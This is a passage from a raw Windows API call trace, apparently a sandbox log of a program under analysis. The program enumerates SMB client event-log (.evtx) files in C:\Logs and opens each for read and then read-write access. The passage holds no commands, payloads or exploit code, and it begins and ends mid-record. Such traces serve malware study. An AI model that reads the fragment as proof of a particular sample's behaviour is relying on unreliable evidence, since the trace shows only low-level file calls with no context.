HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.277] AreFileApisANSI () returned 1 [0087.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0087.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0087.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned 55 [0087.277] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4connectivity.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0087.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.278] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0087.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0087.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.279] AreFileApisANSI () returned 1 [0087.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx", lpUsedDefaultChar=0x0) returned 54 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0087.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.279] AreFileApisANSI () returned 1 [0087.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76110 [0087.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 54 [0087.280] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.280] GetFileType (hFile=0x424) returned 0x1 [0087.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.280] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.280] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.280] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.280] CloseHandle (hObject=0x424) returned 1 [0087.281] AreFileApisANSI () returned 1 [0087.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0087.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 54 [0087.281] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.281] GetFileType (hFile=0x424) returned 0x1 [0087.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.381] CloseHandle (hObject=0x424) returned 1 [0087.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.388] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.388] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.400] AreFileApisANSI () returned 1 [0087.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76098 [0087.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 54 [0087.404] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0087.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.411] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0087.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0087.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0087.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0087.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0087.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0087.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0087.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0087.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.412] AreFileApisANSI () returned 1 [0087.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", lpUsedDefaultChar=0x0) returned 51 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0087.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.413] AreFileApisANSI () returned 1 [0087.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45fd8 [0087.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 51 [0087.413] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.413] GetFileType (hFile=0x424) returned 0x1 [0087.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.413] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.413] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.414] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.414] CloseHandle (hObject=0x424) returned 1 [0087.414] AreFileApisANSI () returned 1 [0087.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0087.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 51 [0087.414] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.414] GetFileType (hFile=0x424) returned 0x1 [0087.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0087.414] CloseHandle (hObject=0x424) returned 1 [0087.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.415] AreFileApisANSI () returned 1 [0087.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0087.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45fd8 [0087.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 51 [0087.415] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.415] HeapFree (in: hHeap=0x20000, 